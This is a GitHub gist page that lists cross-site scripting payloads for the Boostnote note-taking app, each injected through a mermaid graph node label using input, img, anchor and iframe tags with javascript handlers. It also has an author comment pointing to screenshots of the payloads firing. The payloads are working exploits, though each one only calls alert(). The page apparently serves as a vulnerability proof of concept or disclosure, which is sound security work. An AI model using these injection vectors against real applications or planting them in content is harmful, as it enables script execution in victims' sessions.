Skip to content

Instantly share code, notes, and snippets.

@fr4nk404

fr4nk404/xss.md

Last active May 23, 2019 03:32
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save fr4nk404/7bb385ef41f7522bae8e7a137e4302fb to your computer and use it in GitHub Desktop.
Save fr4nk404/7bb385ef41f7522bae8e7a137e4302fb to your computer and use it in GitHub Desktop.
Download ZIP
Some xss on Boostnote
Raw
xss.md

Payloads for Boostnote

For example:

  1. the label input
graph LR
id1[<input onfocus="alert(1)">]
  1. the label img
graph LR
id1[<img src=x onerror="javascript:alert(1)">]
  1. the label a
graph LR
id1[<a href="javascript:alert()"></a>]
  1. the label iframe
graph LR
id1["<iframe src=javascript:alert('xss')></iframe>"]
@fr4nk404
Copy link
Author

fr4nk404 commented May 21, 2019
edited

The label input:
image
The label img:
image
The label a:
image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment